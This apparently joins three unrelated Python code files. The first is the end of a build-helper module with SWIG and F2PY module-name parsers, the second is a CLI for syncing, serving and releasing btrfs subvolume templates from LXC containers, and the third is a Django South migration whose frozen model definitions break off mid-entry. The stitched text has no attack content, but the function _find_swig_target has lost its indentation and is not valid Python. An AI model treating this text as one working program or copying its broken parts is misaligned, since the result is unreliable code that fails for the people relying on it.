_f_pyf_ext_match = re.compile(r'.*[.](f90|f95|f77|for|ftn|f|pyf)\Z',re.I).match
# Matches header-like extensions whose directory must join include_dirs.
_header_ext_match = re.compile(r'.*[.](inc|h|hpp)\Z',re.I).match
#### SWIG related auxiliary functions ####
_swig_module_name_match = re.compile(r'\s*%module\s*(.*\(\s*package\s*=\s*"(?P<package>[\w_]+)".*\)|)\s*(?P<name>[\w_]+)',
re.I).match
_has_c_header = re.compile(r'-[*]-\s*c\s*-[*]-',re.I).search
_has_cpp_header = re.compile(r'-[*]-\s*c[+][+]\s*-[*]-',re.I).search
def get_swig_target(source):
    """Return 'c++' when the first line of *source* carries a C++ emacs
    mode header (``-*- c++ -*-``), otherwise 'c'.

    Only the first line is inspected.  The C check deliberately runs
    second so that a line matching both markers yields 'c', preserving
    the historical behaviour.
    """
    result = 'c'
    # Use a context manager so the file is closed even if readline raises
    # (the original open/close pair leaked the handle on error).
    with open(source, 'r') as f:
        line = f.readline()
    if _has_cpp_header(line):
        result = 'c++'
    if _has_c_header(line):
        result = 'c'
    return result
def get_swig_modulename(source):
    """Return the ``%module`` name declared in SWIG interface file
    *source*, or None when no declaration is found.
    """
    name = None
    # Iterate the file object directly instead of the Python 2
    # ``xreadlines`` fallback; ``with`` guarantees the handle is closed
    # even if the regex machinery raises.
    with open(source, 'r') as f:
        for line in f:
            m = _swig_module_name_match(line)
            if m:
                name = m.group('name')
                break
    return name
def _find_swig_target(target_dir,name):
for ext in ['.cpp','.c']:
target = os.path.join(target_dir,'%s_wrap%s' % (name, ext))
if os.path.isfile(target):
break
return target
#### F2PY related auxiliary functions ####
_f2py_module_name_match = re.compile(r'\s*python\s*module\s*(?P<name>[\w_]+)',
re.I).match
_f2py_user_module_name_match = re.compile(r'\s*python\s*module\s*(?P<name>[\w_]*?'\
'__user__[\w_]*)',re.I).match
def get_f2py_modulename(source):
    """Return the python module name declared in .pyf file *source*,
    skipping generated ``*__user__*`` callback modules.  Returns None
    when no suitable declaration is found.
    """
    name = None
    # ``with`` closes the handle on all paths; iterating the file object
    # replaces the Python 2 ``xreadlines`` fallback.
    with open(source) as f:
        for line in f:
            m = _f2py_module_name_match(line)
            if m:
                if _f2py_user_module_name_match(line):
                    # skip *__user__* names
                    continue
                name = m.group('name')
                break
    return name
##########################################
| |
import os
import click
from urllib.parse import urlparse
import json
import urllib.request
import configparser
import subprocess
from butterknife.pool import LocalPool
from butterknife.subvol import Subvol
def pool_factory(url):
    """Instantiate the pool backend matching *url*'s scheme.

    ``file://`` maps to :class:`LocalPool`, ``http(s)://`` to WebPool and
    ``ssh://`` to SecureShellPool.  Transport modules are imported lazily
    so their optional dependencies are only needed when actually used.

    Raises:
        ValueError: for malformed ``file://`` URLs or an unsupported
            scheme (the original silently returned None for unknown
            schemes and validated with ``assert``, which is stripped
            under ``python -O``).
    """
    o = urlparse(url)
    if o.scheme == "file":
        # file:// carries no authority component; a netloc would also
        # cover any username/password smuggled into the URL.
        if o.netloc:
            raise ValueError("Username, hostname or port not supported for file:// transport")
        if o.fragment or o.query:
            raise ValueError("Fragments and query strings not supported for file:// transport")
        return LocalPool(o.path)
    if o.scheme in ("http", "https"):
        from butterknife.transport.http import WebPool
        return WebPool(o.hostname, o.port, o.path, secure=o.scheme == "https")
    if o.scheme == "ssh":
        from butterknife.transport.ssh import SecureShellPool
        return SecureShellPool(o.hostname, o.port, o.path, o.username)
    raise ValueError("Unsupported pool URL scheme %r" % o.scheme)
def push_pull(source, destination, subvol):
    """Synchronise subvolumes matching filter string *subvol* from
    *source* pool to *destination* pool.

    For every (namespace, identifier, architecture) template the newest
    snapshot present on both sides becomes the parent for an incremental
    ``btrfs send``/``receive``; with no common snapshot a full stream is
    sent.  Progress is piped through ``pv``.  Exits the process with
    status 255 as soon as any element of the pipeline reports failure.
    """
    subvol_filter = Filter(subvol)
    for namespace, identifier, architectures in source.template_list(subvol_filter):
        for architecture in architectures:
            click.echo("Processing %s.%s:%s" % (namespace, identifier, architecture))
            subset_filter = subvol_filter.subset(
                namespace=namespace, identifier=identifier, architecture=architecture)
            source_subvols = sorted(subset_filter.apply(source.subvol_list()))
            destination_subvols = sorted(subset_filter.apply(destination.subvol_list()))
            click.echo("%d subvolumes at %s" % (len(source_subvols), source))
            click.echo("%d subvolumes at %s" % (len(destination_subvols), destination))
            common_subvols = set(source_subvols).intersection(set(destination_subvols))
            if common_subvols:
                parent_subvol = sorted(common_subvols)[-1]
                click.echo("Last common subvol is: %s" % parent_subvol)
                following_subvols = tuple(filter(
                    lambda sv: sv.numeric_version > parent_subvol.numeric_version,
                    source_subvols))
                # typo fix: was "Neet to get"
                click.echo("Need to get %d subvolumes" % len(following_subvols))
            else:
                parent_subvol = None
                following_subvols = source_subvols
                click.echo("No shared subvolumes!")
            if not following_subvols:
                click.echo("All versions of %s.%s:%s synchronized, skipping!" % (namespace, identifier, architecture))
                continue
            # renamed from ``subvol``, which shadowed the function argument
            for pending in following_subvols:
                if parent_subvol:
                    click.echo("Fetching incremental snapshot %s relative to %s" % (pending.version, parent_subvol.version))
                else:
                    click.echo("Fetching full snapshot %s" % pending.version)
                btrfs_send = source.send(pending, parent_subvol)
                pv = subprocess.Popen(("pv",), stdin=btrfs_send.stdout, stdout=subprocess.PIPE, close_fds=True)
                btrfs_receive = destination.receive(pv.stdout, pending, parent_subvol)
                btrfs_receive.communicate()
                if btrfs_receive.returncode or btrfs_send.returncode or pv.returncode:
                    exit(255)
                # the freshly transferred snapshot parents the next delta
                parent_subvol = pending
@click.command(help="Pull subvolumes")
@click.argument("pool")
@click.option("-s", "--subvol", default="@template:*.*:*:*", help="Subvolume filter")
def pull(pool, subvol):
    """Fetch subvolumes matching *subvol* from remote *pool* into the local pool."""
    click.echo("Pulling %s from %s to local pool" % (subvol, pool))
    remote = pool_factory(pool)
    push_pull(remote, LocalPool(), subvol)
@click.command(help="Push subvolumes")
@click.argument("pool")
@click.option("-s", "--subvol", default="@template:*.*:*:*", help="Subvolume filter")
def push(pool, subvol):
    """Send subvolumes matching *subvol* from the local pool to remote *pool*."""
    click.echo("Pushing %s from local pool to %s" % (subvol, pool))
    remote = pool_factory(pool)
    push_pull(LocalPool(), remote, subvol)
@click.command(help="List local or remote subvolumes")
@click.argument("pool", default="file://")
@click.option("--subvol", default="@template:*.*:*:*", help="Subvolume filter")
def list(subvol, pool):
    """Print every subvolume of *pool* accepted by the *subvol* filter.

    NOTE: the function name shadows the builtin ``list``; it is kept
    because the command object is registered under this exact name.
    """
    click.echo("Listing %s in %s" % (subvol, pool))
    selected_pool = pool_factory(pool)
    subvol_filter = Filter(subvol)
    for entry in subvol_filter.apply(selected_pool.subvol_list()):
        click.echo("%s%s" % (selected_pool, entry))
class Filter(object):
    """Glob-style matcher for subvolume identifiers of the form
    ``category:namespace.identifier:architecture:version``, where any
    component may be the wildcard ``*``.
    """

    # Attribute names checked by match(), in pattern order.
    _COMPONENTS = ("category", "namespace", "identifier",
                   "architecture", "version")

    def __init__(self, pattern="@template:*.*:*:*"):
        self.category, name, self.architecture, self.version = pattern.split(":")
        # identifier is everything after the last dot; the namespace may
        # itself contain dots.
        self.namespace, self.identifier = name.rsplit(".", 1)

    def match(self, subvol):
        """Return whether *subvol* satisfies every non-wildcard component."""
        for attr in self._COMPONENTS:
            wanted = getattr(self, attr)
            if wanted != "*" and wanted != getattr(subvol, attr):
                return False
        return True

    def apply(self, iterable):
        """Lazily yield the items of *iterable* accepted by match()."""
        return (item for item in iterable if self.match(item))

    def subset(self, namespace="*", identifier="*", architecture="*", version="*"):
        """Return a new Filter with the given components narrowed; a ``*``
        argument keeps this filter's current value for that component."""
        def narrowed(override, current):
            return current if override == "*" else override
        return Filter("%s:%s.%s:%s:%s" % (
            self.category,
            narrowed(namespace, self.namespace),
            narrowed(identifier, self.identifier),
            narrowed(architecture, self.architecture),
            narrowed(version, self.version)))
@click.command("serve", help="Run built-in HTTP server")
@click.argument("subvol", default="@template:*.*:*:*")
@click.option("-u", "--user", default=None, help="Run as user")
@click.option("-p", "--port", default=80, help="Listen port")
@click.option("-l", "--listen", default="0.0.0.0", help="Listen address")
def serve(subvol, user, port, listen):
    """Serve the local pool over HTTP with a per-request-threaded WSGI server.

    The socket is bound before privileges are dropped, so a privileged
    port works with ``--user``.  When ``--user`` is given, a matching
    /etc/sudoers.d entry for ``btrfs send`` must exist (the unprivileged
    server shells out through sudo to stream subvolumes).
    """
    subvol_filter = Filter(subvol)
    pool = LocalPool()
    click.echo("Serving %s from %s at %s:%d" % (subvol, pool, listen, port))
    # Imported lazily: falcon and the API resources are only needed here.
    from butterknife.api import TemplateResource, VersionResource, LegacyStreamingResource, SubvolResource, StreamResource
    import pwd
    import falcon
    from wsgiref.simple_server import make_server, WSGIServer
    from socketserver import ThreadingMixIn
    class ThreadingWSGIServer(ThreadingMixIn, WSGIServer):
        # One thread per request so long-running streams don't block
        # other clients.
        pass
    print("Listening on %s:%d" % (listen, port))
    app = falcon.API()
    app.add_route("/api/template/", TemplateResource(pool, subvol_filter))
    app.add_route("/api/template/{name}/arch/{arch}/version/", VersionResource(pool, subvol_filter))
    app.add_route("/api/template/{name}/arch/{arch}/version/{version}/stream/", LegacyStreamingResource(pool, subvol_filter))
    app.add_route("/api/subvol/", SubvolResource(pool, subvol_filter))
    app.add_route("/api/subvol/@{subvol}/", StreamResource(pool, subvol_filter))
    app.add_route("/", SubvolResource(pool, subvol_filter))
    app.add_route("/@{subvol}/", StreamResource(pool, subvol_filter))
    httpd = make_server(listen, port, app, ThreadingWSGIServer)
    if user:
        _, _, uid, gid, gecos, root, shell = pwd.getpwnam(user)
        sudoer = os.path.join("/etc/sudoers.d", user)
        if uid == 0:
            print("Please specify unprivileged user, eg 'butterknife'")
            exit(254)
        elif not os.path.exists(sudoer):
            print("Please create %s with following content: %s ALL=(ALL) NOPASSWD: /usr/bin/btrfs send /var/butterknife/pool/@template\\:*" % (sudoer, user))
            exit(253)
        print("Switching to user %s (uid=%d, gid=%d)" % (user, uid, gid))
        # Drop group first: after setuid() the process may no longer
        # have permission to change its gid.
        os.setgid(gid)
        os.setuid(uid)
    elif os.getuid() == 0:
        # typo fix: was "reccommended"
        click.echo("Warning: running as root, this is not recommended!")
    httpd.serve_forever()
@click.command("receive", help="Receive subvolume over multicast")
@click.option("--pool", default="file:///var/butterknife/pool", help="Remote or local pool")
def multicast_receive(pool):
    """Pipe a udpcast multicast stream into the selected pool."""
    receiver = subprocess.Popen(("udp-receiver", "--nokbd"), stdout=subprocess.PIPE)
    destination = pool_factory(pool)
    destination.receive(receiver.stdout)
    receiver.wait()
@click.command("send", help="Send subvolume over multicast")
@click.argument("subvol")
@click.option("--pool", default="file:///var/butterknife/pool", help="Remote or local pool")
@click.option("-m", "--min-wait", default=5, help="Wait until t seconds since first receiver connection has passed")
def multicast_send(subvol, pool, min_wait):
    """Stream *subvol* from the pool through udp-sender to multicast receivers."""
    pool = pool_factory(pool)
    btrfs = pool.send(subvol)
    cmd = "udp-sender", "--nokbd", "--no-progress", "--min-receivers", "1", "--min-wait", str(min_wait)
    udpcast = subprocess.Popen(cmd, stdin=btrfs.stdout)
    btrfs.wait()
    # Fix: also reap udp-sender; it was previously left unwaited, leaving
    # a zombie process (mirror of multicast_receive, which does wait).
    udpcast.wait()
@click.command("release", help="Snapshot a LXC container and release as Butterknife template")
@click.argument("name")
def lxc_release(name):
    """Snapshot LXC container *name* and publish it as a read-only
    Butterknife template subvolume under /var/butterknife/pool.

    Steps: stop the container, merge host + container butterknife.conf,
    record template metadata, snapshot via LXC, run the in-chroot
    prerelease hook, write the merged config into the snapshot and
    finally create the read-only btrfs snapshot in the pool.
    """
    config = configparser.ConfigParser()
    config.read('/etc/butterknife/butterknife.conf')
    import lxc
    container = lxc.Container(name)
    if container.running:
        print("Stopping container")
        container.stop()
    ROOTFS = container.get_config_item("lxc.rootfs")
    assert os.path.isdir(ROOTFS), "No directory at %s" % ROOTFS
    POSTDEPLOY_SCRIPTS = os.path.join(ROOTFS, "etc", "butterknife", "postdeploy.d")
    assert os.path.isdir(POSTDEPLOY_SCRIPTS), "Postinstall scripts directory %s missing!" % POSTDEPLOY_SCRIPTS
    # Container-local config overrides the host-wide defaults read above.
    config.read(os.path.join(ROOTFS, "etc/butterknife/butterknife.conf"))
    if "template" not in config.sections():
        config.add_section("template")
    if "name" not in config["template"]:
        # BUG FIX: original called config.set("template", name), which
        # created an option *named after the container* with no value;
        # the intent (cf. lxc_list) is to default the "name" option.
        config.set("template", "name", name)
    config.set("template", "endpoint", config.get("global", "endpoint"))
    config.set("template", "namespace", config.get("global", "namespace"))
    architecture = container.get_config_item("lxc.arch")
    config.set("template", "architecture", architecture)
    snapshot = container.snapshot()
    config.set("template", "version", snapshot)
    print("Created snapshot:", snapshot)
    snapdir = os.path.join("/var/lib/lxcsnaps", name, snapshot)
    cmd = "chroot", os.path.join(snapdir, "rootfs"), "/usr/local/bin/butterknife-prerelease"
    print("Executing:", " ".join(cmd))
    # (redundant local "import subprocess" removed; imported at module level)
    subprocess.call(cmd)
    with open(os.path.join(snapdir, "rootfs/etc/butterknife/butterknife.conf"), "w") as fh:
        config.write(fh)
    cmd = "btrfs", "subvolume", "snapshot", "-r", os.path.join(snapdir, "rootfs"), \
        "/var/butterknife/pool/@template:%(namespace)s.%(name)s:%(architecture)s:%(version)s" % config["template"]
    print("Executing:", " ".join(cmd))
    subprocess.call(cmd)
@click.command("list", help="Linux Containers that have been prepared for Butterknife")
def lxc_list():
    """Print every LXC container that ships a butterknife template config."""
    import lxc
    for container_name in lxc.list_containers():
        container = lxc.Container(container_name)
        rootfs = container.get_config_item("lxc.rootfs")
        template_config = os.path.join(rootfs, "etc/butterknife/butterknife.conf")
        if not os.path.exists(template_config):
            # Container was never prepared for butterknife: skip silently.
            continue
        # Host-wide defaults first, then the container-local overrides.
        config = configparser.ConfigParser()
        config.read('/etc/butterknife/butterknife.conf')
        config.read(template_config)
        if "template" not in config.sections():
            config.add_section("template")
        if "name" not in config["template"]:
            config.set("template", "name", "?")
        click.echo("%s --> @template:%s:%s:%s" % (
            container_name.ljust(40),
            config.get("global", "namespace"),
            config.get("template", "name"),
            container.get_config_item("lxc.arch")))
@click.command("clean", help="Clean incomplete transfers")
def pool_clean():
    """Delete still-writable (= unfinished) @template subvolumes.

    A completed ``btrfs receive`` leaves the subvolume read-only, so a
    probe write failing with EROFS identifies a finished transfer, which
    is kept; anything writable is an aborted transfer and is deleted.
    """
    import errno
    pool_root = "/var/butterknife/pool"
    for path in os.listdir(pool_root):
        if not path.startswith("@template:"):
            continue
        try:
            # Probe write inside a context manager so the descriptor is
            # closed immediately (the original leaked it).
            with open(os.path.join(pool_root, path, ".test"), "w"):
                pass
        except OSError as e:
            # errno.EROFS replaces the former magic number 30.
            if e.errno == errno.EROFS:  # read-only, hence finished
                continue
        cmd = "btrfs", "subvol", "delete", os.path.join(pool_root, path)
        click.echo("Executing: %s" % " ".join(cmd))
        subprocess.check_output(cmd)
@click.command("release", help="Release systemd namespace as Butterknife template")
def nspawn_release():
    """Not implemented: releasing a systemd-nspawn container as a template."""
    raise NotImplementedError()
@click.command("list", help="systemd namespaces that have been prepared for Butterknife")
def nspawn_list():
    """Not implemented: listing butterknife-prepared nspawn containers."""
    raise NotImplementedError()
@click.command(help="Instantiate template (DANGEROUS!)")
def deploy():
    """Not implemented: deploying a template onto the local machine."""
    raise NotImplementedError()
# Command groups: the empty bodies only anchor click groups; their
# subcommands are attached via .add_command() calls further down.
@click.group(help="Linux Containers interface")
def lxc(): pass
@click.group(help="systemd-nspawn interface")
def nspawn(): pass
@click.group(help="Receive or serve over multicast")
def multicast(): pass
# Wire subcommands into their respective click groups.
multicast.add_command(multicast_receive)
multicast.add_command(multicast_send)
lxc.add_command(lxc_release)
lxc.add_command(lxc_list)
nspawn.add_command(nspawn_release)
nspawn.add_command(nspawn_list)
# Root CLI group: every top-level command and group is registered here.
@click.group()
def entry_point(): pass
entry_point.add_command(serve)
entry_point.add_command(pool_clean)
entry_point.add_command(pull)
entry_point.add_command(push)
entry_point.add_command(list)
entry_point.add_command(multicast)
entry_point.add_command(lxc)
entry_point.add_command(nspawn)
entry_point.add_command(deploy)
| |
# encoding: utf-8
# Copyright 2013 maker
# License
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply: widen OrderedProduct.quantity to DecimalField(max_digits=30)."""
        # Changing field 'OrderedProduct.quantity'
        db.alter_column('sales_orderedproduct', 'quantity', self.gf('django.db.models.fields.DecimalField')(max_digits=30, decimal_places=2))
    def backwards(self, orm):
        """Revert: restore OrderedProduct.quantity to DecimalField(max_digits=4).

        NOTE(review): values wider than 4 digits written after the forwards
        migration may be truncated or rejected by the database on revert.
        """
        # Changing field 'OrderedProduct.quantity'
        db.alter_column('sales_orderedproduct', 'quantity', self.gf('django.db.models.fields.DecimalField')(max_digits=4, decimal_places=2))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.accessentity': {
'Meta': {'object_name': 'AccessEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'core.comment': {
'Meta': {'object_name': 'Comment'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.User']", 'null': 'True', 'blank': 'True'}),
'body': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dislikes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments_disliked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'likes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments_liked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"})
},
'core.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group', '_ormbases': ['core.AccessEntity']},
'accessentity_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.AccessEntity']", 'unique': 'True', 'primary_key': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['core.Group']"})
},
'core.object': {
'Meta': {'object_name': 'Object'},
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.Comment']"}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'objects_created'", 'null': 'True', 'to': "orm['core.User']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dislikes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_disliked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'full_access': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_full_access'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.AccessEntity']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'likes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_liked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'links': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'links_rel_+'", 'null': 'True', 'to': "orm['core.Object']"}),
'nuvius_resource': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'object_type': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'read_access': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_read_access'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.AccessEntity']"}),
'subscribers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'subscriptions'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.Tag']", 'null': 'True', 'blank': 'True'}),
'trash': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'core.tag': {
'Meta': {'ordering': "['name']", 'object_name': 'Tag'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'})
},
'core.user': {
'Meta': {'ordering': "['name']", 'object_name': 'User', '_ormbases': ['core.AccessEntity']},
'accessentity_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.AccessEntity']", 'unique': 'True', 'primary_key': 'True'}),
'default_group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'default_user_set'", 'null': 'True', 'to': "orm['core.Group']"}),
'disabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_access': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'other_groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.Group']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'finance.account': {
'Meta': {'ordering': "['name']", 'object_name': 'Account', '_ormbases': ['core.Object']},
'balance': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'balance_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'balance_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"})
},
'finance.category': {
'Meta': {'object_name': 'Category', '_ormbases': ['core.Object']},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'})
},
'finance.currency': {
'Meta': {'object_name': 'Currency', '_ormbases': ['core.Object']},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'factor': ('django.db.models.fields.DecimalField', [], {'default': '1', 'max_digits': '10', 'decimal_places': '4'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'symbol': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'})
},
'finance.liability': {
'Meta': {'ordering': "['-due_date']", 'object_name': 'Liability', '_ormbases': ['core.Object']},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Account']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Category']", 'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'due_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_liability_source'", 'to': "orm['identities.Contact']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_liability_target'", 'to': "orm['identities.Contact']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'value_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'value_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'finance.tax': {
'Meta': {'object_name': 'Tax', '_ormbases': ['core.Object']},
'compound': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '2'})
},
'finance.transaction': {
'Meta': {'ordering': "['-datetime']", 'object_name': 'Transaction', '_ormbases': ['core.Object']},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Account']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Category']", 'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'liability': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Liability']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_transaction_source'", 'to': "orm['identities.Contact']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_transaction_target'", 'to': "orm['identities.Contact']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'value_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'value_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'identities.contact': {
'Meta': {'ordering': "['name']", 'object_name': 'Contact', '_ormbases': ['core.Object']},
'contact_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.ContactType']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['identities.Contact']"}),
